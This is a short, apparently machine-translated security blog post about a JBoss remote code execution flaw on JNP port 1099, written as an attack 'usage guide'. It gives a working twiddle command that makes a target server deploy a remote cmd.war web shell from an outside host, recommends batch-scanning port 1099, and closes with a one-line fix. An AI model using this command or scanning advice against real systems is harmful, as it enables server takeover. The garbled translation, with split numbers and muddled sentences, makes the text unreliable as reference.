Bird brother a few days ago sent me an article that is a java vulnerability, about 1 0 9 9 port may be remote method invocation thing.
I suddenly think of it, had to XCON2012 of time, due to“forgotten”so there is no mention of a problem is a JBOSS remote code execution vulnerability. The domestic seemingly not see the translation and use of the guide. The time it took so long, actually really forgotten. Its principles and EJBinvoker that almost, saying a few days ago released a EJBinvoker to, in fact, is the old vulnerabilities, all had been together with the release, EXP combat place, just the url is different, but the domestic didn't see the“usage guidelines”of the vulnerability. So much so that many people will not use. Use the guide as follows, what does not Google.
twiddle. bat-s jnp://www. target. net:1 0 9 9 invoke jboss. system:service=MainDeployer deploy http://www.inbreak.net/cmd.war
In fact this was in an article of a foreigner in the article, and several other JBOSS issue all together. Mean remote deploy a war up, specific principles, and EJBInvokerServlet / JMXInvokerServlet substantially uniform, the scanning characteristics are basically the same. So, you can batch scan 1 0 9 9 port. In addition, JBOSS 4 4 4 4-port, looks also not a good bird, no time to analyze, and wait for the answer. I think domestic security circle The most sad thing in most cases“the use of the tool==of the new vulnerability”, so the“exp==vulnerability details”.
Repair recommendations: invoker deleted, then the 1 0 9 9 close.